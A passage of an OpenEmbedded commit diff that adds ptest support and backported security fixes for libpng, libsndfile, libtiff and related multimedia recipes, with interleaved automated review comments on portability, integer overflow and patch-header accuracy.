4LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \ 7LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \
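--- /dev/null
+++ b/meta/recipes-multimedia/libid3tag/libid3tag/cflags_filter.patch
@@ -0,0 +1,21 @@
+configure contains CFLAGS filtering code which was removing our prefix-map
+flags. We need those to generate reproducible binaries. Allow them through.
+
+Upstream-Status: Pending
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Index: libid3tag-0.15.1b/configure.ac
+===================================================================
+--- libid3tag-0.15.1b.orig/configure.ac
++++ libid3tag-0.15.1b/configure.ac
+@@ -99,6 +99,10 @@ do
+ -mno-cygwin)
+ shift
+ ;;
++ -fmacro-prefix-map*|-fdebug-prefix-map*)
++ CFLAGS="$CFLAGS $1"
++ shift
++ ;;
+ -m*)
+ arch="$arch $1"
+ shift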
diff --git a/meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb b/meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb
index 0312a610c0..80581765ac 100644
--- a/meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb
+++ b/meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb
@@ -15,6 +15,7 @@ SRC_URI = "${SOURCEFORGE_MIRROR}/mad/libid3tag-${PV}.tar.gz \
15 file://0001-Fix-gperf-3.1-incompatibility.patch \ 15 file://0001-Fix-gperf-3.1-incompatibility.patch \
16 file://10_utf16.patch \ 16 file://10_utf16.patch \
17 file://unknown-encoding.patch \ 17 file://unknown-encoding.patch \
18 file://cflags_filter.patch \
18 " 19 "
19UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/mad/files/libid3tag/" 20UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/mad/files/libid3tag/"
20UPSTREAM_CHECK_REGEX = "/projects/mad/files/libid3tag/(?P<pver>.*)/$" 21UPSTREAM_CHECK_REGEX = "/projects/mad/files/libid3tag/(?P<pver>.*)/$"
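--- /dev/null
+++ b/meta/recipes-multimedia/libpng/files/run-ptest
@@ -0,0 +1,29 @@
+#!/bin/sh
+
+set -eux
+
+./pngfix pngtest.png &> log.txt 2>&1
+
+if grep -i "OK" log.txt 2>&1 ; then
+ echo "PASS: pngfix passed"
+else
+ echo "FAIL: pngfix failed"
+fi
+rm -f log.txt
+
+./pngtest pngtest.png &> log.txt 2>&1
+
+if grep -i "PASS" log.txt 2>&1 ; then
+ echo "PASS: pngtest passed"
+else
+ echo "FAIL: pngtest failed"
+fi
+rm -f log.txt
+
+for i in pngstest timepng; do
+ if "./${i}" pngtest.png 2>&1; then
+ echo "PASS: $i"
+ else
+ echo "FAIL: $i"
+ fi
+done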
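Review bot: `&> log.txt` on script lines 5 and 14 is a bash extension, but the script runs under `#!/bin/sh`; a strictly POSIX shell such as dash parses it as a background job followed by a truncating redirect, so log.txt can be empty when grep reads it. With `set -e` active, a non-zero exit from pngfix or pngtest also ends the script before its `FAIL:` line is printed. A portable redirect that tolerates the exit status covers both: `./pngfix pngtest.png > log.txt 2>&1 || true` and `./pngtest pngtest.png > log.txt 2>&1 || true`. The script still exits 0 after a FAIL branch, which is fine only if the ptest runner keys off the PASS/FAIL lines.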
diff --git a/meta/recipes-multimedia/libpng/libpng_1.6.37.bb b/meta/recipes-multimedia/libpng/libpng_1.6.37.bb
index 8c53d11642..9387fc8e2e 100644
--- a/meta/recipes-multimedia/libpng/libpng_1.6.37.bb
+++ b/meta/recipes-multimedia/libpng/libpng_1.6.37.bb
@@ -1,4 +1,7 @@
1SUMMARY = "PNG image format decoding library" 1SUMMARY = "PNG image format decoding library"
2DESCRIPTION = "An open source project to develop and maintain the reference \
3library for use in applications that read, create, and manipulate PNG \
4(Portable Network Graphics) raster image files. "
2HOMEPAGE = "http://www.libpng.org/" 5HOMEPAGE = "http://www.libpng.org/"
3SECTION = "libs" 6SECTION = "libs"
4LICENSE = "Libpng" 7LICENSE = "Libpng"
@@ -7,7 +10,10 @@ DEPENDS = "zlib"
7 10
8LIBV = "16" 11LIBV = "16"
9 12
10SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BPN}${LIBV}/${BP}.tar.xz" 13SRC_URI = "\
14 ${SOURCEFORGE_MIRROR}/${BPN}/${BPN}${LIBV}/${BP}.tar.xz \
15 file://run-ptest \
16 "
11SRC_URI[md5sum] = "015e8e15db1eecde5f2eb9eb5b6e59e9" 17SRC_URI[md5sum] = "015e8e15db1eecde5f2eb9eb5b6e59e9"
12SRC_URI[sha256sum] = "505e70834d35383537b6491e7ae8641f1a4bed1876dbfe361201fc80868d88ca" 18SRC_URI[sha256sum] = "505e70834d35383537b6491e7ae8641f1a4bed1876dbfe361201fc80868d88ca"
13 19
@@ -17,7 +23,7 @@ UPSTREAM_CHECK_URI = "http://libpng.org/pub/png/libpng.html"
17 23
18BINCONFIG = "${bindir}/libpng-config ${bindir}/libpng16-config" 24BINCONFIG = "${bindir}/libpng-config ${bindir}/libpng16-config"
19 25
20inherit autotools binconfig-disabled pkgconfig 26inherit autotools binconfig-disabled pkgconfig ptest
21 27
22# Work around missing symbols 28# Work around missing symbols
23EXTRA_OECONF_append_class-target = " ${@bb.utils.contains("TUNE_FEATURES", "neon", "--enable-arm-neon=on", "--enable-arm-neon=off" ,d)}" 29EXTRA_OECONF_append_class-target = " ${@bb.utils.contains("TUNE_FEATURES", "neon", "--enable-arm-neon=on", "--enable-arm-neon=off" ,d)}"
@@ -30,3 +36,11 @@ BBCLASSEXTEND = "native nativesdk"
30 36
31# CVE-2019-17371 is actually a memory leak in gif2png 2.x 37# CVE-2019-17371 is actually a memory leak in gif2png 2.x
32CVE_CHECK_WHITELIST += "CVE-2019-17371" 38CVE_CHECK_WHITELIST += "CVE-2019-17371"
39
40do_install_ptest() {
41 install -m644 "${S}/pngtest.png" "${D}${PTEST_PATH}"
42 install -m755 "${B}/.libs/pngfix" "${D}${PTEST_PATH}"
43 install -m755 "${B}/.libs/pngtest" "${D}${PTEST_PATH}"
44 install -m755 "${B}/.libs/pngstest" "${D}${PTEST_PATH}"
45 install -m755 "${B}/.libs/timepng" "${D}${PTEST_PATH}"
46}
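--- /dev/null
+++ b/meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch
@@ -0,0 +1,13 @@
+Index: libsamplerate-0.1.8/configure.ac
+===================================================================
+--- libsamplerate-0.1.8.orig/configure.ac
++++ libsamplerate-0.1.8/configure.ac
+@@ -53,7 +53,7 @@ AC_PROG_LN_S
+ # 6. If any interfaces have been removed since the last public release, then set age
+ # to 0.
+
+-SHARED_VERSION_INFO="1:8:1"
++SHARED_VERSION_INFO="1:9:1"
+
+
+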
diff --git a/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb b/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb
index ae08189441..8345d6880f 100644
--- a/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb
+++ b/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Audio Sample Rate Conversion library" 1SUMMARY = "Audio Sample Rate Conversion library"
2DESCRIPTION = "Also known as Secret Rabbit Code - a library for performing sample rate conversion of audio data."
2HOMEPAGE = "http://www.mega-nerd.com/SRC/" 3HOMEPAGE = "http://www.mega-nerd.com/SRC/"
3SECTION = "libs" 4SECTION = "libs"
4LICENSE = "BSD-2-Clause" 5LICENSE = "BSD-2-Clause"
@@ -9,6 +10,7 @@ PR = "r1"
9 10
10SRC_URI = "http://www.mega-nerd.com/SRC/libsamplerate-${PV}.tar.gz \ 11SRC_URI = "http://www.mega-nerd.com/SRC/libsamplerate-${PV}.tar.gz \
11 file://0001-configure.ac-improve-alsa-handling.patch \ 12 file://0001-configure.ac-improve-alsa-handling.patch \
13 file://shared_version_info.patch \
12" 14"
13 15
14SRC_URI[md5sum] = "2b78ae9fe63b36b9fbb6267fad93f259" 16SRC_URI[md5sum] = "2b78ae9fe63b36b9fbb6267fad93f259"
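--- /dev/null
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch
@@ -0,0 +1,36 @@
+From a9815b3f228df00086e0a40bcc43162fc19896a1 Mon Sep 17 00:00:00 2001
+From: bobsayshilol <bobsayshilol@live.co.uk>
+Date: Wed, 17 Feb 2021 23:21:48 +0000
+Subject: [PATCH 1/2] wavlike: Fix incorrect size check
+
+The SF_CART_INFO_16K struct has an additional 4 byte field to hold
+the size of 'tag_text' which the file header doesn't, so don't
+include it as part of the check when looking for the max length.
+
+https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=26026
+
+Upstream-Status: Backport
+CVE: CVE-2021-3246 patch 1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ src/wavlike.c | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+Index: libsndfile-1.0.28/src/wavlike.c
+===================================================================
+--- libsndfile-1.0.28.orig/src/wavlike.c
++++ libsndfile-1.0.28/src/wavlike.c
+@@ -803,7 +803,11 @@ wavlike_read_cart_chunk (SF_PRIVATE *psf
+ return 0 ;
+ } ;
+
+- if (chunksize >= sizeof (SF_CART_INFO_16K))
++ /*
++ ** SF_CART_INFO_16K has an extra field 'tag_text_size' that isn't part
++ ** of the chunk, so don't include it in the size check.
++ */
++ if (chunksize >= sizeof (SF_CART_INFO_16K) - 4)
+ { psf_log_printf (psf, "cart : %u too big to be handled\n", chunksize) ;
+ psf_binheader_readf (psf, "j", chunksize) ;
+ return 0 ;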
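--- /dev/null
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch
@@ -0,0 +1,44 @@
+From deb669ee8be55a94565f6f8a6b60890c2e7c6f32 Mon Sep 17 00:00:00 2001
+From: bobsayshilol <bobsayshilol@live.co.uk>
+Date: Thu, 18 Feb 2021 21:52:09 +0000
+Subject: [PATCH 2/2] ms_adpcm: Fix and extend size checks
+
+'blockalign' is the size of a block, and each block contains 7 samples
+per channel as part of the preamble, so check against 'samplesperblock'
+rather than 'blockalign'. Also add an additional check that the block
+is big enough to hold the samples it claims to hold.
+
+https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=26803
+
+Upstream-Status: Backport
+CVE: CVE-2021-3246 patch 2
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ src/ms_adpcm.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/src/ms_adpcm.c b/src/ms_adpcm.c
+index 5e8f1a31..a21cb994 100644
+--- a/src/ms_adpcm.c
++++ b/src/ms_adpcm.c
+@@ -128,8 +128,14 @@ wavlike_msadpcm_init (SF_PRIVATE *psf, int blockalign, int samplesperblock)
+ if (psf->file.mode == SFM_WRITE)
+ samplesperblock = 2 + 2 * (blockalign - 7 * psf->sf.channels) / psf->sf.channels ;
+
+- if (blockalign < 7 * psf->sf.channels)
+- { psf_log_printf (psf, "*** Error blockalign (%d) should be > %d.\n", blockalign, 7 * psf->sf.channels) ;
++ /* There's 7 samples per channel in the preamble of each block */
++ if (samplesperblock < 7 * psf->sf.channels)
++ { psf_log_printf (psf, "*** Error samplesperblock (%d) should be >= %d.\n", samplesperblock, 7 * psf->sf.channels) ;
++ return SFE_INTERNAL ;
++ } ;
++
++ if (2 * blockalign < samplesperblock * psf->sf.channels)
++ { psf_log_printf (psf, "*** Error blockalign (%d) should be >= %d.\n", blockalign, samplesperblock * psf->sf.channels / 2) ;
+ return SFE_INTERNAL ;
+ } ;
+
+--
+2.25.1
+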
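Review bot: Both added checks do their arithmetic in plain `int` (`7 * psf->sf.channels`, `2 * blockalign`, `samplesperblock * psf->sf.channels`) on values that presumably come from the file header, so a large enough product can overflow and let the comparison pass. Widening before multiplying closes that gap, for example `if (2 * (sf_count_t) blockalign < (sf_count_t) samplesperblock * psf->sf.channels)`, with the same cast in the first check. Whether the callers already bound these fields is not visible here, and wavlike_msadpcm_init continues outside the hunk.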
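--- /dev/null
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-4156.patch
@@ -0,0 +1,30 @@
+From ced91d7b971be6173b604154c39279ce90ad87cc Mon Sep 17 00:00:00 2001
+From: yuan <ssspeed00@gmail.com>
+Date: Tue, 20 Apr 2021 16:16:32 +0800
+Subject: [PATCH] flac: Fix improper buffer reusing (#732)
+
+Upstream-Status: Backport [https://github.com/libsndfile/libsndfile/commit/ced91d7b971be6173b604154c39279ce90ad87cc]
+CVE: CVE-2021-4156
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/flac.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/src/flac.c b/src/flac.c
+index 0be82ac..4fa5cfa 100644
+--- a/src/flac.c
++++ b/src/flac.c
+@@ -952,7 +952,11 @@ flac_read_loop (SF_PRIVATE *psf, unsigned len)
+ /* Decode some more. */
+ while (pflac->pos < pflac->len)
+ { if (FLAC__stream_decoder_process_single (pflac->fsd) == 0)
++ { psf_log_printf (psf, "FLAC__stream_decoder_process_single returned false\n") ;
++ /* Current frame is busted, so NULL the pointer. */
++ pflac->frame = NULL ;
+ break ;
++ } ;
+ state = FLAC__stream_decoder_get_state (pflac->fsd) ;
+ if (state >= FLAC__STREAM_DECODER_END_OF_STREAM)
+ { psf_log_printf (psf, "FLAC__stream_decoder_get_state returned %s\n", FLAC__StreamDecoderStateString [state]) ;
+--
+2.40.1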
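--- /dev/null
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2022-33065.patch
@@ -0,0 +1,46 @@
+From 0754562e13d2e63a248a1c82f90b30bc0ffe307c Mon Sep 17 00:00:00 2001
+From: Alex Stewart <alex.stewart@ni.com>
+Date: Tue, 10 Oct 2023 16:10:34 -0400
+Subject: [PATCH] mat4/mat5: fix int overflow in dataend calculation
+
+The clang sanitizer warns of a possible signed integer overflow when
+calculating the `dataend` value in `mat4_read_header()`.
+
+```
+src/mat4.c:323:41: runtime error: signed integer overflow: 205 * -100663296 cannot be represented in type 'int'
+SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/mat4.c:323:41 in
+src/mat4.c:323:48: runtime error: signed integer overflow: 838860800 * 4 cannot be represented in type 'int'
+SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/mat4.c:323:48 in
+```
+
+Cast the offending `rows` and `cols` ints to `sf_count_t` (the type of
+`dataend` before performing the calculation, to avoid the issue.
+
+CVE: CVE-2022-33065
+Fixes: https://github.com/libsndfile/libsndfile/issues/789
+Fixes: https://github.com/libsndfile/libsndfile/issues/833
+
+Signed-off-by: Alex Stewart <alex.stewart@ni.com>
+
+Upstream-Status: Backport [https://github.com/libsndfile/libsndfile/commit/0754562e13d2e63a248a1c82f90b30bc0ffe307c]
+CVE: CVE-2022-33065
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/mat4.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/mat4.c b/src/mat4.c
+index 3c73680..e2f98b7 100644
+--- a/src/mat4.c
++++ b/src/mat4.c
+@@ -320,7 +320,7 @@ mat4_read_header (SF_PRIVATE *psf)
+ psf->filelength - psf->dataoffset, psf->sf.channels * psf->sf.frames * psf->bytewidth) ;
+ }
+ else if ((psf->filelength - psf->dataoffset) > psf->sf.channels * psf->sf.frames * psf->bytewidth)
+- psf->dataend = psf->dataoffset + rows * cols * psf->bytewidth ;
++ psf->dataend = psf->dataoffset + (sf_count_t) rows * (sf_count_t) cols * psf->bytewidth ;
+
+ psf->datalength = psf->filelength - psf->dataoffset - psf->dataend ;
+
+--
+2.40.1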
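Review bot: The patch header should state how much of the CVE this backport covers, because the subject reads "mat4/mat5" while the diffstat and the only hunk touch `src/mat4.c`, and the `CVE: CVE-2022-33065` tag presumably makes cve-check report the CVE as patched on the strength of this one cast. It is worth confirming against the referenced upstream commit that no mat5 change was dropped and that no sibling overflow fixes belong to the same CVE. If the backport is partial, a header line such as `Comment: carries only the mat4.c change of the upstream fix` would keep the CVE from reading as fully closed. mat4_read_header starts and ends outside the hunk.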
diff --git a/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb b/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb
index b100108766..fb7d94ab75 100644
--- a/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb
@@ -1,4 +1,7 @@
1SUMMARY = "Audio format Conversion library" 1SUMMARY = "Audio format Conversion library"
2DESCRIPTION = "Library for reading and writing files containing sampled \
3sound (such as MS Windows WAV and the Apple/SGI AIFF format) through \
4one standard library interface."
2HOMEPAGE = "http://www.mega-nerd.com/libsndfile" 5HOMEPAGE = "http://www.mega-nerd.com/libsndfile"
3AUTHOR = "Erik de Castro Lopo" 6AUTHOR = "Erik de Castro Lopo"
4DEPENDS = "flac libogg libvorbis" 7DEPENDS = "flac libogg libvorbis"
@@ -17,7 +20,11 @@ SRC_URI = "http://www.mega-nerd.com/libsndfile/files/libsndfile-${PV}.tar.gz \
17 file://CVE-2017-12562.patch \ 20 file://CVE-2017-12562.patch \
18 file://CVE-2018-19758.patch \ 21 file://CVE-2018-19758.patch \
19 file://CVE-2019-3832.patch \ 22 file://CVE-2019-3832.patch \
20 " 23 file://CVE-2021-3246_1.patch \
24 file://CVE-2021-3246_2.patch \
25 file://CVE-2022-33065.patch \
26 file://CVE-2021-4156.patch \
27 "
21 28
22SRC_URI[md5sum] = "646b5f98ce89ac60cdb060fcd398247c" 29SRC_URI[md5sum] = "646b5f98ce89ac60cdb060fcd398247c"
23SRC_URI[sha256sum] = "1ff33929f042fa333aed1e8923aa628c3ee9e1eb85512686c55092d1e5a9dfa9" 30SRC_URI[sha256sum] = "1ff33929f042fa333aed1e8923aa628c3ee9e1eb85512686c55092d1e5a9dfa9"
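--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch
@@ -0,0 +1,52 @@
+From b12a0326e6064b6e0b051d1184a219877472f69b Mon Sep 17 00:00:00 2001
+From: 4ugustus <wangdw.augustus@qq.com>
+Date: Tue, 25 Jan 2022 16:25:28 +0000
+Subject: [PATCH] tiffset: fix global-buffer-overflow for ASCII tags where
+ count is required (fixes #355)
+
+CVE: CVE-2022-22844
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/03047a26952a82daaa0792957ce211e0aa51bc64]
+Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com>
+Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com>
+Comments: Add header stdint.h in tiffset.c explicitly for UINT16_MAX
+---
+ tools/tiffset.c | 17 ++++++++++++++---
+ 1 file changed, 14 insertions(+), 3 deletions(-)
+
+diff --git a/tools/tiffset.c b/tools/tiffset.c
+index 8c9e23c5..e7a88c09 100644
+--- a/tools/tiffset.c
++++ b/tools/tiffset.c
+@@ -33,6 +33,7 @@
+ #include <string.h>
+ #include <stdlib.h>
+
++#include <stdint.h>
+ #include "tiffio.h"
+
+ static char* usageMsg[] = {
+@@ -146,9 +146,19 @@ main(int argc, char* argv[])
+
+ arg_index++;
+ if (TIFFFieldDataType(fip) == TIFF_ASCII) {
+- if (TIFFSetField(tiff, TIFFFieldTag(fip), argv[arg_index]) != 1)
+- fprintf( stderr, "Failed to set %s=%s\n",
+- TIFFFieldName(fip), argv[arg_index] );
++ if(TIFFFieldPassCount( fip )) {
++ size_t len;
++ len = strlen(argv[arg_index]) + 1;
++ if (len > UINT16_MAX || TIFFSetField(tiff, TIFFFieldTag(fip),
++ (uint16_t)len, argv[arg_index]) != 1)
++ fprintf( stderr, "Failed to set %s=%s\n",
++ TIFFFieldName(fip), argv[arg_index] );
++ } else {
++ if (TIFFSetField(tiff, TIFFFieldTag(fip),
++ argv[arg_index]) != 1)
++ fprintf( stderr, "Failed to set %s=%s\n",
++ TIFFFieldName(fip), argv[arg_index] );
++ }
+ } else if (TIFFFieldWriteCount(fip) > 0
+ || TIFFFieldWriteCount(fip) == TIFF_VARIABLE) {
+ int ret = 1;
+--
+GitLab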
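Review bot: The second hunk header of the embedded patch, `@@ -146,9 +146,19 @@`, keeps the same start line on both sides although the first hunk already adds `#include <stdint.h>`, so the new-side offset looks stale after the manual edit recorded in `Comments:`. Patch tools normally locate the hunk by its context, but regenerating the file with git format-patch against the recipe's source tree would keep this security backport internally consistent. In the fix itself, an over-long value (`len > UINT16_MAX`) prints the same `Failed to set %s=%s` message as a TIFFSetField failure; a separate message for the length rejection would make it easier to diagnose. main() starts and ends outside the hunk.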
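--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch
@@ -0,0 +1,148 @@
+From 02875964eba5c4a2ea98c41562835428214adfe7 Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Sat, 7 Mar 2020 13:21:56 +0100
+Subject: [PATCH] tiff2rgba: output usage to stdout when using -h
+
+also uses std C EXIT_FAILURE / EXIT_SUCCESS
+see #17
+
+Signed-off-by: akash hadke <akash.hadke@kpit.com>
+---
+ tools/tiff2rgba.c | 39 ++++++++++++++++++++++++---------------
+ 1 file changed, 24 insertions(+), 15 deletions(-)
+---
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/02875964eba5c4a2ea98c41562835428214adfe7.patch]
+---
+diff --git a/tools/tiff2rgba.c b/tools/tiff2rgba.c
+index 2eb6f6c4..ef643653 100644
+--- a/tools/tiff2rgba.c
++++ b/tools/tiff2rgba.c
+@@ -39,6 +39,13 @@
+ #include "tiffiop.h"
+ #include "tiffio.h"
+
++#ifndef EXIT_SUCCESS
++#define EXIT_SUCCESS 0
++#endif
++#ifndef EXIT_FAILURE
++#define EXIT_FAILURE 1
++#endif
++
+ #define streq(a,b) (strcmp(a,b) == 0)
+ #define CopyField(tag, v) \
+ if (TIFFGetField(in, tag, &v)) TIFFSetField(out, tag, v)
+@@ -68,7 +75,7 @@ main(int argc, char* argv[])
+ extern char *optarg;
+ #endif
+
+- while ((c = getopt(argc, argv, "c:r:t:bn8")) != -1)
++ while ((c = getopt(argc, argv, "c:r:t:bn8h")) != -1)
+ switch (c) {
+ case 'b':
+ process_by_block = 1;
+@@ -86,7 +93,7 @@ main(int argc, char* argv[])
+ else if (streq(optarg, "zip"))
+ compression = COMPRESSION_DEFLATE;
+ else
+- usage(-1);
++ usage(EXIT_FAILURE);
+ break;
+
+ case 'r':
+@@ -105,17 +112,20 @@ main(int argc, char* argv[])
+ bigtiff_output = 1;
+ break;
+
++ case 'h':
++ usage(EXIT_SUCCESS);
++ /*NOTREACHED*/
+ case '?':
+- usage(0);
++ usage(EXIT_FAILURE);
+ /*NOTREACHED*/
+ }
+
+ if (argc - optind < 2)
+- usage(-1);
++ usage(EXIT_FAILURE);
+
+ out = TIFFOpen(argv[argc-1], bigtiff_output?"w8":"w");
+ if (out == NULL)
+- return (-2);
++ return (EXIT_FAILURE);
+
+ for (; optind < argc-1; optind++) {
+ in = TIFFOpen(argv[optind], "r");
+@@ -132,7 +142,7 @@ main(int argc, char* argv[])
+ }
+ }
+ (void) TIFFClose(out);
+- return (0);
++ return (EXIT_SUCCESS);
+ }
+
+ static int
+@@ -166,7 +176,7 @@ cvt_by_tile( TIFF *in, TIFF *out )
+ if (tile_width != (rastersize / tile_height) / sizeof( uint32))
+ {
+ TIFFError(TIFFFileName(in), "Integer overflow when calculating raster buffer");
+- exit(-1);
++ exit(EXIT_FAILURE);
+ }
+ raster = (uint32*)_TIFFmalloc(rastersize);
+ if (raster == 0) {
+@@ -182,7 +192,7 @@ cvt_by_tile( TIFF *in, TIFF *out )
+ if (tile_width != wrk_linesize / sizeof (uint32))
+ {
+ TIFFError(TIFFFileName(in), "Integer overflow when calculating wrk_line buffer");
+- exit(-1);
++ exit(EXIT_FAILURE);
+ }
+ wrk_line = (uint32*)_TIFFmalloc(wrk_linesize);
+ if (!wrk_line) {
+@@ -279,7 +289,7 @@ cvt_by_strip( TIFF *in, TIFF *out )
+ if (width != (rastersize / rowsperstrip) / sizeof( uint32))
+ {
+ TIFFError(TIFFFileName(in), "Integer overflow when calculating raster buffer");
+- exit(-1);
++ exit(EXIT_FAILURE);
+ }
+ raster = (uint32*)_TIFFmalloc(rastersize);
+ if (raster == 0) {
+@@ -295,7 +305,7 @@ cvt_by_strip( TIFF *in, TIFF *out )
+ if (width != wrk_linesize / sizeof (uint32))
+ {
+ TIFFError(TIFFFileName(in), "Integer overflow when calculating wrk_line buffer");
+- exit(-1);
++ exit(EXIT_FAILURE);
+ }
+ wrk_line = (uint32*)_TIFFmalloc(wrk_linesize);
+ if (!wrk_line) {
+@@ -528,7 +538,7 @@ tiffcvt(TIFF* in, TIFF* out)
+ return( cvt_whole_image( in, out ) );
+ }
+
+-static char* stuff[] = {
++const static char* stuff[] = {
+ "usage: tiff2rgba [-c comp] [-r rows] [-b] [-n] [-8] input... output",
+ "where comp is one of the following compression algorithms:",
+ " jpeg\t\tJPEG encoding",
+@@ -547,13 +557,12 @@ static char* stuff[] = {
+ static void
+ usage(int code)
+ {
+- char buf[BUFSIZ];
+ int i;
++ FILE * out = (code == EXIT_SUCCESS) ? stdout : stderr;
+
+- setbuf(stderr, buf);
+- fprintf(stderr, "%s\n\n", TIFFGetVersion());
++ fprintf(out, "%s\n\n", TIFFGetVersion());
+ for (i = 0; stuff[i] != NULL; i++)
+- fprintf(stderr, "%s\n", stuff[i]);
++ fprintf(out, "%s\n", stuff[i]);
+ exit(code);
+ }
+
+--
+GitLab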
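--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch
@@ -0,0 +1,27 @@
+From ca70b5e702b9f503333344b2d46691de9feae84e Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Sat, 3 Oct 2020 18:16:27 +0200
+Subject: [PATCH] tiff2rgba.c: fix -Wold-style-declaration warning
+
+Signed-off-by: akash hadke <akash.hadke@kpit.com>
+---
+ tools/tiff2rgba.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+---
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/ca70b5e702b9f503333344b2d46691de9feae84e.patch]
+---
+diff --git a/tools/tiff2rgba.c b/tools/tiff2rgba.c
+index ef643653..fbc383aa 100644
+--- a/tools/tiff2rgba.c
++++ b/tools/tiff2rgba.c
+@@ -538,7 +538,7 @@ tiffcvt(TIFF* in, TIFF* out)
+ return( cvt_whole_image( in, out ) );
+ }
+
+-const static char* stuff[] = {
++static const char* stuff[] = {
+ "usage: tiff2rgba [-c comp] [-r rows] [-b] [-n] [-8] input... output",
+ "where comp is one of the following compression algorithms:",
+ " jpeg\t\tJPEG encoding",
+--
+GitLab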
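--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2020-35521_and_CVE-2020-35522.patch
@@ -0,0 +1,119 @@
+From 98a254f5b92cea22f5436555ff7fceb12afee84d Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Sun, 15 Nov 2020 17:02:51 +0100
+Subject: [PATCH 1/2] enforce (configurable) memory limit in tiff2rgba
+
+fixes #207
+fixes #209
+
+Signed-off-by: akash hadke <akash.hadke@kpit.com>
+---
+ tools/tiff2rgba.c | 25 +++++++++++++++++++++++--
+ 1 file changed, 23 insertions(+), 2 deletions(-)
+---
+CVE: CVE-2020-35521
+CVE: CVE-2020-35522
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/b5a935d96b21cda0f434230cdf8ca958cd8b4eef.patch]
+---
+diff --git a/tools/tiff2rgba.c b/tools/tiff2rgba.c
+index fbc383aa..764395f6 100644
+--- a/tools/tiff2rgba.c
++++ b/tools/tiff2rgba.c
+@@ -60,6 +60,10 @@ uint32 rowsperstrip = (uint32) -1;
+ int process_by_block = 0; /* default is whole image at once */
+ int no_alpha = 0;
+ int bigtiff_output = 0;
++#define DEFAULT_MAX_MALLOC (256 * 1024 * 1024)
++/* malloc size limit (in bytes)
++ * disabled when set to 0 */
++static tmsize_t maxMalloc = DEFAULT_MAX_MALLOC;
+
+
+ static int tiffcvt(TIFF* in, TIFF* out);
+@@ -75,8 +79,11 @@ main(int argc, char* argv[])
+ extern char *optarg;
+ #endif
+
+- while ((c = getopt(argc, argv, "c:r:t:bn8h")) != -1)
++ while ((c = getopt(argc, argv, "c:r:t:bn8hM:")) != -1)
+ switch (c) {
++ case 'M':
++ maxMalloc = (tmsize_t)strtoul(optarg, NULL, 0) << 20;
++ break;
+ case 'b':
+ process_by_block = 1;
+ break;
+@@ -405,6 +412,12 @@ cvt_whole_image( TIFF *in, TIFF *out )
+ (unsigned long)width, (unsigned long)height);
+ return 0;
+ }
++ if (maxMalloc != 0 && (tmsize_t)pixel_count * (tmsize_t)sizeof(uint32) > maxMalloc) {
++ TIFFError(TIFFFileName(in),
++ "Raster size " TIFF_UINT64_FORMAT " over memory limit (" TIFF_UINT64_FORMAT "), try -b option.",
++ (uint64)pixel_count * sizeof(uint32), (uint64)maxMalloc);
++ return 0;
++ }
+
+ rowsperstrip = TIFFDefaultStripSize(out, rowsperstrip);
+ TIFFSetField(out, TIFFTAG_ROWSPERSTRIP, rowsperstrip);
+@@ -530,6 +543,13 @@ tiffcvt(TIFF* in, TIFF* out)
+ TIFFSetField(out, TIFFTAG_SOFTWARE, TIFFGetVersion());
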